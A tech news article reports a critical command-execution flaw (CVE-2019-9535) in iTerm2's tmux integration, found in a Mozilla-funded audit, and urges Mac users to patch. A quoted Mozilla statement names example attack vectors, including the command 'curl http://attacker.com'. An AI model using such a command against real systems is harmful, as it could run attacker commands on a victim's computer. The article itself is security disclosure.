Patch now, Mac users: Critical 7-year-old flaw in open-source macOS app iTerm2

iTerm2 whips out patch after a Mozilla-sponsored audit turns up an ancient critical flaw.
Written by Liam Tung, Contributing Writer

The makers of iTerm2, a popular open-source terminal emulator app for macOS, have released a patch to address a critical flaw discovered during an audit sponsored by Firefox-maker Mozilla. 

Any developers or admins using the iTerm2 app should install the available patch immediately, judging by Mozilla's description, and it sounds like the bug could be exploited in as yet unknown ways.  

"An attacker who can produce output to the terminal can, in many cases, execute commands on the user's computer," Mozilla's Tom Ritter writes

"Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples." 

SEE: Six in-demand programming languages: Getting started (free PDF)    

The bug was found in the tmux integration feature of iTerm2, where it's been lurking for seven years. 

Mozilla opted to support the audit of iTerm2 because of its popularity with developers and admins, funding the audit from the Mozilla Open Source Support Program (MOSS). The audit was carried out by not-for-profit security consultancy Radically Open Security. MOSS has also supported the Tor Project, Tails, and whistleblower tip system SecureDrop.   

iTerm2 serves the same purpose as the native Terminal macOS app for those who use the command line. 

Mozilla notes that the vulnerability, which has been assigned the identifier CVE-2019-9535, does require some user interaction to exploit it. But because it can be exploited by commands, it is potentially dangerous. 

"This is a serious security issue because in some circumstances it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2," iTerm2 developers explain in a note urging users to update

The fix is available in version 3.3.6 of iTerm 2, which was released on October 9, a few days after a separate update that does not address the flaw. 

iTerm2's audit was sponsored by the third tranche of the MOSS, which Mozilla created after the 2014 disclosure of Heartbleed, the bug in OpenSLL, a widely-used open-source library for protecting communications between browsers and websites.  

Editorial standards